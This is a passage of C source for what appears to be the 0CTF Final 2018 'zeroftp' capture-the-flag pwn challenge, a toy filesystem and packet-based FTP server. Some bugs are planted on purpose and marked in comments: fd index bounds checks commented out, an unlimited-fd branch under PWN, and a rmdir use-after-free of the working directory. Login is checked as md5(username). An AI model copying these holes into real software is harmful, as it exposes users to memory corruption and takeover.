BLOCK_SIZE, en - BLOCK_SIZE); } if (en > BLOCK_SIZE) { memcpy(buf, &(state->disk->blocks[blockId].data[st]), BLOCK_SIZE - st); buf = (char *)buf + BLOCK_SIZE - st; return _memory_read(blockId_, buf, 0, en - BLOCK_SIZE) + BLOCK_SIZE - st; } memcpy(buf, &(state->disk->blocks[blockId].data[st]), en - st); return en - st; } static int _create_inode(void) { if (!state->disk->freeList) { LOG("[_create_inode] no enough inodes"); exit(-1); } inode_t *inode = state->disk->freeList; state->disk->freeList = inode->info.next; inode->info.blockId = -1; inode->linkNr = 1; inode->size = 0; return inode->inumber; } static int _free_inode(long int inumber) { long int blockId = state->disk->inodes[inumber].info.blockId; long int res; inode_t *inode = &(state->disk->inodes[inumber]); if (inode->linkNr) { LOG("[_free_inode] inode is still inuse (%ld)", inumber); return -1; } while (blockId != -1) { res = blockId; blockId = state->disk->blocks[blockId].nextId; _free_block(res); } LOG("[_free_inode] blocks clear"); inode->size = 0; inode->info.next = state->disk->freeList; state->disk->freeList = inode; return 0; } static char *_fullpath(fnode_t *fnode) { if (fnode->parent == fnode) { return strdup("/"); } char *pas = _fullpath(fnode->parent); if (fnode->type == NORMAL_FILE) { char *res = malloc(strlen(pas) + strlen(fnode->name)); strcpy(res, pas); strcat(res, fnode->name); free(pas); return res; } else { char *res = malloc(strlen(pas) + strlen(fnode->name) + 1); strcpy(res, pas); strcat(res, fnode->name); strcat(res, "/"); free(pas); return res; } } static inline void _unlink_fnode(fnode_t *fnode) { fnode_t *dnode = fnode->parent; if (fnode == dnode) { LOG("[_unlink_fnode] try to unlink root"); return; } if (dnode->info.child == fnode) { dnode->info.child = fnode->brother; return; } for (fnode_t *cur = dnode->info.child; cur != NULL; cur = cur->brother) { if (cur->brother == fnode) { cur->brother = fnode->brother; return; } } DEBUG_CHECK(exit(-1);); return; } static char *_filename(const char *pathname) { const char *cur = &(pathname[strlen(pathname)-1]); while ((*cur != '/') && (cur != pathname - 1)) { cur--; } cur++; if (*cur == '\x00') { return NULL; } else { return strdup(cur); } } static fnode_t *_resolve_path(const char *pathname, int padir) { fnode_t *cur; char *tmp; if (pathname[0] == '/') { cur = state->root; if (pathname[1] == '\x00') { return cur; } tmp = strdup(pathname); } else { cur = state->pwd; tmp = malloc(strlen(pathname) + 3); CHECK_MALLOC(tmp, NULL); memset(tmp, 0, strlen(pathname) + 3); tmp[0] = '.'; tmp[1] = '/'; strcat(tmp + 2, pathname); } if (pathname[strlen(pathname)-1] == '/') { tmp[strlen(tmp)-1] = '\x00'; } char c; if (padir) { do { c = tmp[strlen(tmp)-1]; tmp[strlen(tmp)-1] = '\x00'; } while (c != '/'); } char *token = strtok(tmp, "/"); while (token) { LOG("[_resolve_path] get token (%s)", token); if (strcmp(token, ".") == 0) { goto next; } if (strcmp(token, "..") == 0) { cur = cur->parent; goto next; } cur = cur->info.child; if (cur == NULL) { LOG("[_resolve_path] No subdir/subfile"); free(tmp); return NULL; } while (strcmp(token, cur->name)) { cur = cur->brother; if (!cur) { LOG("[_resolve_path] No subdir/subfile with name (%s)", token); free(tmp); return NULL; } } next: token = strtok(NULL, "/"); } LOG("[_resolve_path] Find node (%s) for %s", cur->name, pathname); free(tmp); return cur; } static IOFile *_create_IOFile(fnode_t *fnode, int flags) { IOFile *io_file = (IOFile *) malloc(sizeof(IOFile)); CHECK_MALLOC(io_file, NULL); io_file->fnode = fnode; io_file->cur = 0; io_file->flags = flags; return io_file; } static void _init_disk(zerofs_disk *disk) { for (int i = 0; i < (INODES_NUM - 1); i++) { disk->inodes[i].info.next = &(disk->inodes[i+1]); disk->inodes[i].inumber = i; disk->inodes[i].size = 0; } disk->inodes[INODES_NUM - 1].info.next = NULL; disk->inodes[INODES_NUM - 1].inumber = (INODES_NUM - 1); disk->inodes[INODES_NUM - 1].size = 0; disk->freeList = &(disk->inodes[0]); DEBUG_CHECK( int j = 0; for (inode_t *ptr = disk->freeList; ptr != NULL; ptr = ptr->info.next) { if ((ptr->inumber != j) || (ptr->size)) { exit(-1); } j++; } if (j == INODES_NUM) { LOG("[_init_disk] inodes.next ok"); } else exit(-1); ); for (int i = 0; i < BLOCKS_NUM; i++) { disk->blocks[i].nextId = -1; } } static int _insert_IOFile(IOFile *io_file) { int fd = 0; // XXX: BUG of unlimited fd #ifdef PWN while (state->io_files[fd]) { fd++; } state->io_files[fd] = io_file; return fd; #else for (fd = 0; fd < FD_MAX; fd++) { if (!state->io_files[fd]) { state->io_files[fd] = io_file; return fd; } } return -1; #endif } static fnode_t *_create_fnode(file_t type, const char *name, perm_t perm, long int inumber) { fnode_t *node = (fnode_t*) malloc(sizeof(fnode_t)); CHECK_MALLOC(node, 0); node->type = type; node->name = strdup(name); node->perm = perm; node->modifyTime = node->createTime = time(NULL); node->parent = node; node->brother = NULL; if (type == NORMAL_FILE) { if (inumber == -1) { node->info.inumber = _create_inode(); } else { node->info.inumber = inumber; state->disk->inodes[inumber].linkNr++; } } else { node->info.child = NULL; } LOG("[_create_fnode] create fileNode ok (%s)", node->name); return node; } /* * API Functions */ ssize_t zerofs_initfs(const char *username) { LOG("[zerofs_initfs] zerofs_initfs starts"); state = (zerofs_state*) malloc(sizeof(zerofs_state)); CHECK_MALLOC(state, NULL); LOG("[zerofs_initfs] state ok (%#lx)", (unsigned long) state); state->userId = 0xdd; // ONLY XDD COULD HANDLE THIS FILESYSTEM LOG("[zerofs_initfs] userId ok (%#lx)", state->userId); state->username = strdup(username); LOG("[zerofs_initfs] username ok (%s)", state->username); state->disk = mmap(NULL, sizeof(zerofs_disk), PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0); CHECK_MALLOC(state->disk, MAP_FAILED); LOG("[zerofs_initfs] disk mmap ok (%#lx)", (unsigned long) state->disk); memset(state->disk, 0, sizeof(zerofs_disk)); LOG("[zerofs_initfs] disk memset ok"); _init_disk(state->disk); LOG("[zerofs_initfs] disk init ok"); state->pwd = state->root = _create_fnode(DIRECTORY, "/", PWRITE|PREAD, -1); LOG("[zerofs_initfs] pwd and root ok (%#lx)", (unsigned long) state->root); memset(state->io_files, 0, sizeof(state->io_files)); LOG("[zerofs_initfs] io_files ok"); DEBUG_CHECK( for (int i = 0; i < FD_MAX; i++) if (state->io_files[i]) { LOG("[zerofs_initfs] error on io_files's memset"); exit(-1); } ); return 0; } int zerofs_open(const char *pathname, int flags){ fnode_t *fnode = _resolve_path(pathname, 0); if (!fnode) { LOG("[zerofs_open] no such a file (%s)", pathname); if (flags == O_RDONLY) { LOG("[zerofs_open] read a non-existed file (%s)", pathname); return -1; } fnode_t *dnode = _resolve_path(pathname, 1); if (!dnode) { LOG("[zerofs_open] no such file or directory (%s)", pathname); return -1; } if ((dnode->perm & PWRITE) == 0) { LOG("[zerofs_open] cannot create anything in a non-write dir (%s)", dnode->name); return -1; } char *filename = _filename(pathname); if (!filename) { LOG("[zerofs_open] no filename (%s)", pathname); return -1; } fnode = _create_fnode(NORMAL_FILE, filename, PWRITE|PREAD, -1); free(filename); INSERT_FNODE(fnode, dnode); } else { if (fnode->type == DIRECTORY) { LOG("[zerofs_open] try to open a directory (%s)", fnode->name); return -1; } if ((flags == O_RDONLY) && (!(fnode->perm & PREAD))) { LOG("[zerofs_open] access delay (%s)", fnode->name); return -1; } if ((flags == O_WRONLY) && (!(fnode->perm & PWRITE))) { LOG("[zerofs_open] access delay (%s)", fnode->name); return -1; } if ((flags == O_RDWR) && ((fnode->perm & (PWRITE|PREAD)) != (PWRITE|PREAD))) { LOG("[zerofs_open] access delay (%s)", fnode->name); return -1; } } IOFile *io_file = _create_IOFile(fnode, flags); return _insert_IOFile(io_file); } int zerofs_close(int fd) { if (!state->io_files[fd]) { LOG("[zerofs_close] unused fd (%d)", fd); return -1; } // if ((fd < 0) || (fd >= FD_MAX)) { // LOG("[zerofs_close] invalid fd (%d)", fd); // return -1; // } free(state->io_files[fd]); state->io_files[fd] = 0; return 0; } int zerofs_chdir(const char *pathname) { fnode_t *fnode = _resolve_path(pathname, 0); if (!fnode) { LOG("[zerofs_chdir] no such directory (%s)", pathname); return -1; } if (fnode->type != DIRECTORY) { LOG("[zerofs_chdir] pathname is not a directory (%s)", pathname); return -1; } state->pwd = fnode; LOG("[zerofs_chdir] pwd is \"%s\" now", state->pwd->name); return 0; } int zerofs_mkdir(const char *pathname, int flags) { fnode_t *dnode = _resolve_path(pathname, 1); if (!dnode) { LOG("[zerofs_mkdir] no such directory (%s)", pathname); return -1; } if (dnode->type != DIRECTORY) { LOG("[zerofs_mkdir] no such directory (%s)", pathname); return -1; } if (!(dnode->perm & PWRITE)) { LOG("[zerofs_mkdir] directory cannot be written (%s)", dnode->name); return -1; } if (_resolve_path(pathname, 0)) { LOG("[zerofs_mkdir] directory already exists (%s)", pathname); return -1; } perm_t perm; switch (flags) { case O_RDONLY: perm = PREAD; break; case O_WRONLY: perm = PWRITE; break; case O_RDWR: perm = PWRITE|PREAD; break; default: LOG("[zerofs_mkdir] invalid flags (%d)", flags); return -1; } char *filename = _filename(pathname); fnode_t *fnode = _create_fnode(DIRECTORY, filename, perm, -1); free(filename); LOG("[zerofs_mkdir] new fnode (%p)", fnode); INSERT_FNODE(fnode, dnode); return 0; } int zerofs_rmdir(const char *pathname) { fnode_t *fnode = _resolve_path(pathname, 0); if (!fnode) { LOG("[zerofs_rmdir] no such directory (%s)", pathname); return -1; } if (fnode->info.child) { LOG("[zerofs_rmdir] directory is not empty (%s)", pathname); return -1; } if (fnode->type != DIRECTORY) { LOG("[zerofs_rmdir] no such directory (%s)", pathname); return -1; } // XXX: BUG for target directory is pwd //#ifdef PWN // NOTHING TO DO //#else if (fnode == state->pwd) { LOG("[zerofs_rmdir] cannot remove pwd (%s)", pathname); return -1; } //#endif LOG("[zerofs_rmdir] remove directory (%s)", fnode->name); _unlink_fnode(fnode); free(fnode); return 0; } off_t zerofs_lseek(int fd, off_t offset, int whence) { // if ((fd < 0) || (fd >= FD_MAX)) { // LOG("[zerofs_lseek] invalid fd (%d)", fd); // return -1; // } if (!state->io_files[fd]) { LOG("[zerofs_lseek] no such fd (%d)", fd); return -1; } IOFile *io_file = state->io_files[fd]; long int offset_; long int file_size = state->disk->inodes[io_file->fnode->info.inumber].size; switch (whence) { case SEEK_SET: offset_ = offset; break; case SEEK_CUR: offset_ = offset + io_file->cur; break; case SEEK_END: offset_ = offset + file_size; break; default: return -1; } if ((offset_ < 0) || (offset_ > file_size)) { LOG("[zerofs_lseek] invalid offset (%ld)", offset); return -1; } io_file->cur = offset_; return io_file->cur; } char **zerofs_list(const char *pathname) { fnode_t *fnode = _resolve_path(pathname, 0); char **res; if (!fnode) { LOG("[zerofs_list] no such file or directory (%s)", pathname); fail: res = malloc(sizeof(char *)); CHECK_MALLOC(res, 0); *res = NULL; return res; } if (fnode->type == DIRECTORY) { LOG("[zerofs_list] find directory (%s)", fnode->name); if (!(fnode->perm & PREAD)) { LOG("[zerofs_list] access delay (%s)", fnode->name); goto fail; } int num = 0; for (fnode_t *cur = fnode->info.child; cur != NULL; cur = cur->brother) { num++; } LOG("[zerofs_list] find %d children", num); res = malloc(sizeof(char *) * (num + 1)); CHECK_MALLOC(res, 0); num = 0; for (fnode_t *cur = fnode->info.child; cur != NULL; cur = cur->brother) { res[num] = _fullpath(cur); num++; } res[num] = NULL; return res; } if (fnode->type == NORMAL_FILE) { LOG("[zerofs_list] find normal file (%s)", fnode->name); if (!(fnode->parent->perm & PREAD)) { LOG("[zerofs_list] access delay (%s)", fnode->parent->name); goto fail; } res = malloc(sizeof(char *) * 2); res[0] = _fullpath(fnode); res[1] = NULL; return res; } goto fail; } int zerofs_elemset(const char *pathname, elem_t elem, value_t value) { fnode_t *fnode = _resolve_path(pathname, 0); if (!fnode) { LOG("[zerofs_elemset] no such file or directory (%s)", pathname); return -1; } switch (elem) { case FNAME: if (!strcmp(value.ptr, ".") || !strcmp(value.ptr, "..") || strchr(value.ptr, '/')) { LOG("[zerofs_elemset] invalid new name (%s)", value.ptr); return -1; } // if (fnode->parent == fnode) { // LOG("[zerofs_elemset] try to rename root"); // return -1; // } LOG("[zerofs_elemset] checking same name (%s)", value.ptr); for (fnode_t *cur = fnode->parent->info.child; cur != NULL; cur = cur->brother) { LOG("[zerofs_elemset] cur name (%s)", cur->name); if (!strcmp(value.ptr, cur->name)) { LOG("[zerofs_elemset] same name in directory (%s)", value.ptr); return -1; } } LOG("[zerofs_elemset] valid name (%s)", value.ptr); // free(fnode->name); // fnode->name = strdup(value.ptr); if (strlen(value.ptr)<=strlen(fnode->name)) strncpy(fnode->name, value.ptr, strlen(fnode->name)); else { free(fnode->name); fnode->name = strdup(value.ptr); } break; case FTYPE: LOG("[zerofs_elemset] cannot set type"); return -1; // fnode->type = value.num; // break; case FPERM: fnode->perm = value.num; break; case FSIZE: LOG("[zerofs_elemset] cannot set size"); return -1; case FLINK: LOG("[zerofs_elemset] cannot set link number"); return -1; case FCTIME: fnode->createTime = value.num; break; case FMTIME: fnode->modifyTime = value.num; break; default: LOG("[zerofs_elemset] invalid type"); return -1; } LOG("[zerofs_elemset] set value (%#lx)", value.num); return 0; } value_t zerofs_elemget(const char *pathname, elem_t elem) { fnode_t *fnode = _resolve_path(pathname, 0); value_t value; if (!fnode) { LOG("[zerofs_elemget] no such file or directory (%s)", pathname); value.num = -1; return value; } switch (elem) { case FNAME: value.ptr = strdup(fnode->name); break; case FTYPE: value.num = fnode->type; break; case FPERM: value.num = fnode->perm; break; case FSIZE: if (fnode->type == DIRECTORY) { value.num = 320; } else { value.num = state->disk->inodes[fnode->info.inumber].size; } break; case FLINK: if (fnode->type == DIRECTORY) { value.num = 1; } else { value.num = state->disk->inodes[fnode->info.inumber].linkNr; } break; case FCTIME: value.num = fnode->createTime; break; case FMTIME: value.num = fnode->modifyTime; break; default: value.num = -1; } LOG("[zerofs_elemget] get value (%#lx)", value.num); return value; } int zerofs_link(const char *oldpath, const char *newpath) { fnode_t *old_fnode = _resolve_path(oldpath, 0); if (!old_fnode) { LOG("[zerofs_link] no such file (%s)", oldpath); return -1; } if (old_fnode->type == DIRECTORY) { LOG("[zerofs_link] %s is a directory", old_fnode->name); return -1; } if (_resolve_path(newpath, 0)) { LOG("[zerofs_link] file already exists (%s)", newpath); return -1; } fnode_t *new_dnode = _resolve_path(newpath, 1); if (!new_dnode) { LOG("[zerofs_link] no sucu directory (%s)", newpath); return -1; } if (new_dnode->type == NORMAL_FILE) { LOG("[zerofs_link] %s is a normal file", new_dnode->name); return -1; } if (!(new_dnode->perm & PWRITE)) { LOG("[zerofs_link] access delay (%s)", new_dnode->name); return -1; } char *filename = _filename(newpath); fnode_t *new_fnode = _create_fnode(NORMAL_FILE, filename, old_fnode->perm, old_fnode->info.inumber); free(filename); INSERT_FNODE(new_fnode, new_dnode); return 0; } int zerofs_unlink(const char *pathname) { fnode_t *fnode = _resolve_path(pathname, 0); if (!fnode) { LOG("[zerofs_unlink] no such file or directory (%s)", pathname); return -1; } if (fnode->type == DIRECTORY) { LOG("[zerofs_unlink] cannot unlink a directory"); return -1; } for (int fd = 0; fd < FD_MAX; fd++) { if ((state->io_files[fd]) && (state->io_files[fd]->fnode == fnode)) { int res = zerofs_close(fd); LOG("[zerofs_unlink] close fd (%d) with return value (%d)", fd, res); } } LOG("[zerofs_unlink] clear all fds"); if (!(--state->disk->inodes[fnode->info.inumber].linkNr)) { _free_inode(fnode->info.inumber); } free(fnode->name); _unlink_fnode(fnode); free(fnode); fnode = 0; return 0; } char *zerofs_pwd(void) { return _fullpath(state->pwd); } ssize_t zerofs_read(int fd, void *buf, size_t count) { // if ((fd >= FD_MAX) || (!state->io_files[fd]) || (fd < 0)) { // LOG("[zerofs_read] invalid fd (%d)", fd); // return -1; // } IOFile *io_file = state->io_files[fd]; long int file_size = state->disk->inodes[io_file->fnode->info.inumber].size; long int start = io_file->cur; long int end = io_file->cur + count; if (end > file_size) { end = file_size; } if (start >= end) { LOG("[zerofs_read] nothing to read"); return 0; } long int inumber = io_file->fnode->info.inumber; long int blockId = state->disk->inodes[inumber].info.blockId; ssize_t ret = _memory_read(blockId, buf, start, end); if (ret != -1) { io_file->cur = end; } return ret; } int zerofs_truncate(const char *pathname, off_t length) { if (length < 0) { LOG("[zerofs_truncate] invalid offset (%d)", length); } fnode_t *fnode = _resolve_path(pathname, 0); if (!fnode) { LOG("[zerofs_truncate] no such file or directory (%s)", pathname); return -1; } if (fnode->type == DIRECTORY) { LOG("[zerofs_truncate] try to truncate a directory (%s)", pathname); return -1; } long int blockId = state->disk->inodes[fnode->info.inumber].info.blockId; long int old_size = state->disk->inodes[fnode->info.inumber].size; state->disk->inodes[fnode->info.inumber].info.blockId = _memory_truncate(blockId, length, old_size); state->disk->inodes[fnode->info.inumber].size = length; for (int i = 0; i < FD_MAX; i++) { if ((state->io_files[i]) && (state->io_files[i]->fnode == fnode) && (state->io_files[i]->cur > length)) { state->io_files[i]->cur = length; } } return 0; } ssize_t zerofs_write(int fd, const void *buf, size_t count) { // if ((fd >= FD_MAX) || (!state->io_files[fd]) || (fd < 0)) { // LOG("[zerofs_write] invalid fd (%d)", fd); // return -1; // } IOFile *io_file = state->io_files[fd]; long int start = io_file->cur; long int end = io_file->cur + count; long int file_size = state->disk->inodes[io_file->fnode->info.inumber].size; if (end > file_size) { state->disk->inodes[io_file->fnode->info.inumber].size = end; } if (start >= end) { LOG("[zerofs_write] nothing to write"); return 0; } io_file->fnode->modifyTime = time(NULL); long int inumber = io_file->fnode->info.inumber; long int blockId = state->disk->inodes[inumber].info.blockId; if (blockId == -1) { blockId = state->disk->inodes[inumber].info.blockId = _create_block(); } ssize_t ret = _memory_write(blockId, buf, start, end); if (ret != -1) { io_file->cur = end; } return ret; } #ifdef DEBUG #ifndef SHELL int main() { printf("Hello World!\n"); zerofs_initfs("izhuer"); int fd = zerofs_open("izhuer", O_WRONLY); printf("fd: %d\n", fd); zerofs_close(fd); zerofs_close(fd); zerofs_chdir("izhuer"); zerofs_chdir("/"); zerofs_mkdir("izhuer", O_RDONLY); zerofs_mkdir("./izhuer", O_RDWR); zerofs_mkdir("/izhuer", O_RDWR); zerofs_mkdir("xuexue", O_RDWR); zerofs_chdir("./../../xuexue"); zerofs_mkdir("test_rd", O_RDONLY); zerofs_mkdir("test_wr", O_WRONLY); zerofs_mkdir("test_rdwr", O_RDWR); zerofs_chdir("test_rd"); zerofs_mkdir("test", O_RDONLY); zerofs_chdir(".."); zerofs_rmdir("test_rdwr"); zerofs_chdir("test_rdwr"); zerofs_chdir("/xuexue/"); char **res; res = zerofs_list(".../../../../"); while (*res) { printf("%s\n", *res); res++; } zerofs_elemget(".", FCTIME); value_t value; value.num = 0; zerofs_elemset(".", FCTIME, value); zerofs_elemget(".", FCTIME); value.ptr = strdup("../test"); zerofs_elemset(".", FNAME, value); res = zerofs_list("/"); while (*res) { printf("%s\n", *res); res++; } res = zerofs_list("."); while (*res) { printf("%s\n", *res); res++; } value.ptr = strdup("izhuer"); zerofs_elemset(".", FNAME, value); value.ptr = strdup("izhuer2"); zerofs_elemset(".", FNAME, value); puts(zerofs_pwd()); for (int i = 0; i < 0x50; i ++) printf("%d\n", _create_block()); _free_block(0x1); printf("%d\n", _create_block()); _free_block(0x48); printf("%d\n", _create_block()); res = zerofs_list("/"); while (*res) { printf("%s\n", *res); res++; } zerofs_unlink("/izhuer"); res = zerofs_list("/"); while (*res) { printf("%s\n", *res); res++; } fd = zerofs_open("/izhuer3", O_RDWR); char *buf = strdup("zzdawang"); printf("TEST: buf: \"%s\"\n", buf); zerofs_write(fd, buf, 0x8); zerofs_close(fd); *((long int *)buf) = 0; printf("TEST: buf: \"%s\"\n", buf); fd = zerofs_open("/izhuer3", O_RDWR); zerofs_read(fd, buf, 0x8); zerofs_close(fd); printf("TEST: buf: \"%s\"\n", buf); zerofs_chdir("/"); zerofs_link("/izhuer3", "izhuer4"); res = zerofs_list("."); while (*res) { printf("%s\n", *res); res++; } int fd1, fd2; fd1 = zerofs_open("/izhuer3", O_RDWR); zerofs_read(fd1, buf, 0x8); printf("TEST: buf: \"%s\"\n", buf); zerofs_truncate("izhuer4", 0x10000); fd2 = zerofs_open("izhuer4", O_RDWR); zerofs_write(fd2, "aixuexue", 0x8); zerofs_read(fd1, buf, 0x8); printf("TEST: buf: \"%s\"\n", buf); zerofs_lseek(fd1, 0, SEEK_SET); zerofs_read(fd1, buf, 0x8); printf("TEST: buf: \"%s\"\n", buf); zerofs_close(fd1); zerofs_close(fd2); } #endif #endif ================================================ FILE: 2018/0ctf-final-2018/pwn/zeroftp/zerofs.h ================================================ /************************************************************************* > File Name: zerofs.h > Author: > Mail: > Created Time: Thu May 3 16:44:48 2018 ************************************************************************/ #ifndef _ZEROFS_H #define _ZEROFS_H #include #include #define INODES_NUM 0x100 #define BLOCKS_NUM 0x100 #define BLOCK_SIZE 0x1000 #define FD_MAX 0x10 /* * Enumerations */ typedef enum { DIRECTORY, NORMAL_FILE, } file_t; typedef enum { PWRITE = 0x1, PREAD = 0x2, PEXECUTE = 0x4, } perm_t; typedef enum { FNAME, FTYPE, FPERM, FSIZE, FCTIME, FMTIME, FLINK, } elem_t; /* * Unions */ typedef union { char *ptr; long int num; } value_t; /* * Structures */ typedef struct inode_t { union inodeInfo { struct inode_t *next; long int blockId; } info; long int size; long int inumber; long int linkNr; } inode_t; typedef struct { char data[BLOCK_SIZE]; long int nextId; } block_t; typedef struct { long int bitmap[BLOCKS_NUM / 0x40]; inode_t inodes[INODES_NUM]; inode_t *freeList; block_t blocks[BLOCKS_NUM]; } zerofs_disk; typedef struct fnode_t { union { struct fnode_t *child; long int inumber; } info; perm_t perm; file_t type; time_t createTime; time_t modifyTime; long int userId; struct fnode_t *parent; struct fnode_t *brother; char *name; } fnode_t; typedef struct IOFile { long int cur; fnode_t *fnode; int flags; } IOFile; typedef struct { long int userId; char *username; zerofs_disk *disk; fnode_t *root; fnode_t *pwd; IOFile *io_files[FD_MAX]; } zerofs_state; /* * Functions */ ssize_t zerofs_initfs(const char *username); // DONE ssize_t zerofs_read(int fd, void *buf, size_t count); // DONE ssize_t zerofs_write(int fd, const void *buf, size_t count); int zerofs_open(const char *pathname, int flags); // DONE BUG int zerofs_close(int fd); // DONE int zerofs_unlink(const char *pathname); // DONE int zerofs_link(const char *oldpath, const char *newpath); int zerofs_chdir(const char *pathname); // DONE int zerofs_rmdir(const char *pathname); // DONE BUG int zerofs_mkdir(const char *pathname, int flags); // DONE off_t zerofs_lseek(int fd, off_t offset, int whence); // DONE int zerofs_truncate(const char *path, off_t length); // DONE value_t zerofs_elemget(const char *pathname, elem_t elem); // DONE int zerofs_elemset(const char *pathname, elem_t elem, value_t value); // DONE BUG char **zerofs_list(const char *pathname); // DONE char *zerofs_pwd(void); #endif ================================================ FILE: 2018/0ctf-final-2018/pwn/zeroftp/zeroftp.c ================================================ #include #include #include #include #include #include #include #include #include "zero_pack.h" #include "zero_proto.h" #include "md5.h" #include "string.h" #include "zero_utils.h" #include "crc32.h" #include "zerofs.h" #include #ifdef DEBUG #define LOG(...) printf(__VA_ARGS__) #else #define LOG(...) #endif #ifdef SERVER #define ZERO_SEND(buf, size) zero_send(buf, size) #define ZERO_RECV(buf, size) zero_recv(buf, size) #else #define ZERO_SEND(buf, size) write(1, buf, size) #define ZERO_RECV(buf, size) read(0, buf, size) #endif #define CHECK_MALLOC(ptr, err) { \ do { \ if ((ptr) == (err)) { \ exit(-1); \ } \ } while (0); \ } static int is_regular_file(const char *path) { struct stat path_stat; stat(path, &path_stat); return S_ISREG(path_stat.st_mode); } void zeroftp_send(uint8_t *packet, size_t data_len) { uint32_t crc32; packet[0] = ZERO_MAGIC; *((uint32_t *)&packet[ZERO_MAGIC_LEN]) = htonl(data_len); crc32 = crc32_compute(0, packet+ZERO_MAGIC_LEN+4, data_len); *((uint32_t *)&packet[ZERO_MAGIC_LEN+4+data_len]) = htonl(crc32); size_t packet_len = ZERO_MAGIC_LEN+4+data_len+4; ZERO_SEND(packet, packet_len); #ifdef DEBUG zero_hexdump(packet, packet_len); #endif } void zeroftp_result_bool(int result) { uint8_t *result_packet, *result_data_in, *result_data_out; size_t data_len, zero_pack_len_val; zero_basic_t *zeroftp_result; zero_bool_new(&zeroftp_result, result); zero_pack_len_val = zero_pack_len(zeroftp_result); result_packet = (uint8_t *)malloc(zero_pack_len_val+0x100); result_data_in = result_packet+5; zero_pack(zeroftp_result, result_data_in, &result_data_out); data_len = result_data_out-result_packet-5; zeroftp_send(result_packet, data_len); zero_basic_free(zeroftp_result); free(result_packet); } void zeroftp_result_int(uint64_t val) { uint8_t *result_packet, *result_data_in, *result_data_out; size_t data_len, zero_pack_len_val; zero_basic_t *zeroftp_result; zero_int_new(&zeroftp_result, val, 1); zero_pack_len_val = zero_pack_len(zeroftp_result); result_packet = (uint8_t *)malloc(zero_pack_len_val+0x100); result_data_in = result_packet+5; zero_pack(zeroftp_result, result_data_in, &result_data_out); data_len = result_data_out-result_packet-5; zeroftp_send(result_packet, data_len); zero_basic_free(zeroftp_result); free(result_packet); } void zeroftp_result_raw(uint8_t *raw, uint8_t raw_size) { uint8_t *result_packet, *result_data_in, *result_data_out; size_t data_len, zero_pack_len_val; zero_basic_t *zeroftp_result; zero_raw_new(&zeroftp_result, raw, raw_size); zero_pack_len_val = zero_pack_len(zeroftp_result); result_packet = (uint8_t *)malloc(zero_pack_len_val+0x100); result_data_in = result_packet+5; zero_pack(zeroftp_result, result_data_in, &result_data_out); data_len = result_data_out-result_packet-5; zeroftp_send(result_packet, data_len); zero_basic_free(zeroftp_result); free(result_packet); } void zeroftp_result_string(uint8_t *str) { uint8_t *result_packet, *result_data_in, *result_data_out; size_t data_len, zero_pack_len_val; zero_basic_t *zeroftp_result; zero_string_new(&zeroftp_result, str); zero_pack_len_val = zero_pack_len(zeroftp_result); result_packet = (uint8_t *)malloc(zero_pack_len_val+0x100); result_data_in = result_packet+5; zero_pack(zeroftp_result, result_data_in, &result_data_out); data_len = result_data_out-result_packet-5; zeroftp_send(result_packet, data_len); zero_basic_free(zeroftp_result); free(result_packet); } void zeroftp_result_list(zero_basic_t **list) { uint8_t *result_packet, *result_data_in, *result_data_out; size_t data_len, zero_pack_len_val; zero_basic_t *zeroftp_result; zero_list_new(&zeroftp_result, list); zero_pack_len_val = zero_pack_len(zeroftp_result); result_packet = (uint8_t *)malloc(zero_pack_len_val+0x100); result_data_in = result_packet+5; zero_pack(zeroftp_result, result_data_in, &result_data_out); data_len = result_data_out-result_packet-5; zeroftp_send(result_packet, data_len); zero_basic_free(zeroftp_result); free(result_packet); } int g_logined = 0; void zeroftp_cmd_dispatcher(uint8_t *cmd, uint32_t cmd_len) { uint8_t *arg1; uint8_t *arg2; uint8_t *arg3; uint8_t *arg4; zero_basic_t *zeroftp_cmd; zero_basic_t *zeroftp_arg1, *zeroftp_arg2, *zeroftp_arg3; int unpack_res = 0; unpack_res = zero_unpack_int(cmd, &arg1, &zeroftp_cmd); if (unpack_res == -1) { goto LABEL_FAILED; } if (ZERO_BASIC_TYPE(zeroftp_cmd) == ZERO_INT) { switch(ZERO_INT_VAL(zeroftp_cmd)) { case ZEROFTP_LOGIN: // arg1 username arg2 user_password unpack_res = zero_unpack_string(arg1, &arg2, &zeroftp_arg1); if (unpack_res == -1) { goto LABEL_FAILED; } unpack_res = zero_unpack_raw(arg2, &arg3, &zeroftp_arg2); if (unpack_res == -1) { goto LABEL_FAILED; } char *username = ZERO_STRING_VAL(zeroftp_arg1); if (zeroftp_arg2->len != 16) { zero_basic_free(zeroftp_arg1); zero_basic_free(zeroftp_arg2); goto LABEL_FAILED; } uint8_t *password = zeroftp_arg2->ptr; uint8_t username_md5[16]; md5((uint8_t*)username, strlen(username), username_md5); if(memcmp(password, username_md5, 16)) { LOG("login failed\n"); //zeroftp_result_bool(0); //return; zero_basic_free(zeroftp_arg1); zero_basic_free(zeroftp_arg2); goto LABEL_FAILED; } else { #ifndef ZEROFS LOG("login success\n"); #else zerofs_initfs(username); #endif g_logined = 1; zeroftp_result_bool(1); } zero_basic_free(zeroftp_arg1); zero_basic_free(zeroftp_arg2); break; case ZEROFTP_LS: if (!g_logined) { //zeroftp_result_bool(0); //return; goto LABEL_FAILED; } // arg1 pathname unpack_res = zero_unpack_string(arg1, &arg2, &zeroftp_arg1); if (unpack_res == -1) { goto LABEL_FAILED; } char *ls_pathname = ZERO_STRING_VAL(zeroftp_arg1); #ifndef ZEROFS char *ls_list[3] = {"AAAA", "BBBB", NULL}; //char *ls_list[3] = {NULL}; #else char **ls_list = NULL; ls_list = zerofs_list(ls_pathname); #endif size_t zero_string_list_len = 0; PTRARRAY_LEN(ls_list, zero_string_list_len); zero_basic_t **zero_string_list = (zero_basic_t **)malloc(sizeof(zero_basic_t *)*(zero_string_list_len+1)); CHECK_MALLOC(zero_string_list, NULL); size_t ls_i = 0; zero_basic_t *zero_string_tmp; char *ls_tmp = ls_list[0]; while (ls_tmp) { zero_string_new(&zero_string_tmp, ls_tmp); zero_string_list[ls_i] = zero_string_tmp; ls_i++; ls_tmp = ls_list[ls_i]; } zero_string_list[ls_i] = NULL; zeroftp_result_list(zero_string_list); free(zero_string_list); zero_basic_free(zeroftp_arg1); break; case ZEROFTP_CD: if (!g_logined) { goto LABEL_FAILED; } // arg1 pathname unpack_res = zero_unpack_string(arg1, &arg2, &zeroftp_arg1); if (unpack_res == -1) { goto LABEL_FAILED; } char *cd_pathname = ZERO_STRING_VAL(zeroftp_arg1); #ifndef ZEROFS int cd_result = 0; #else int cd_result = zerofs_chdir(cd_pathname); #endif if (cd_result == 0) { zeroftp_result_bool(1); } else { goto LABEL_FAILED; } 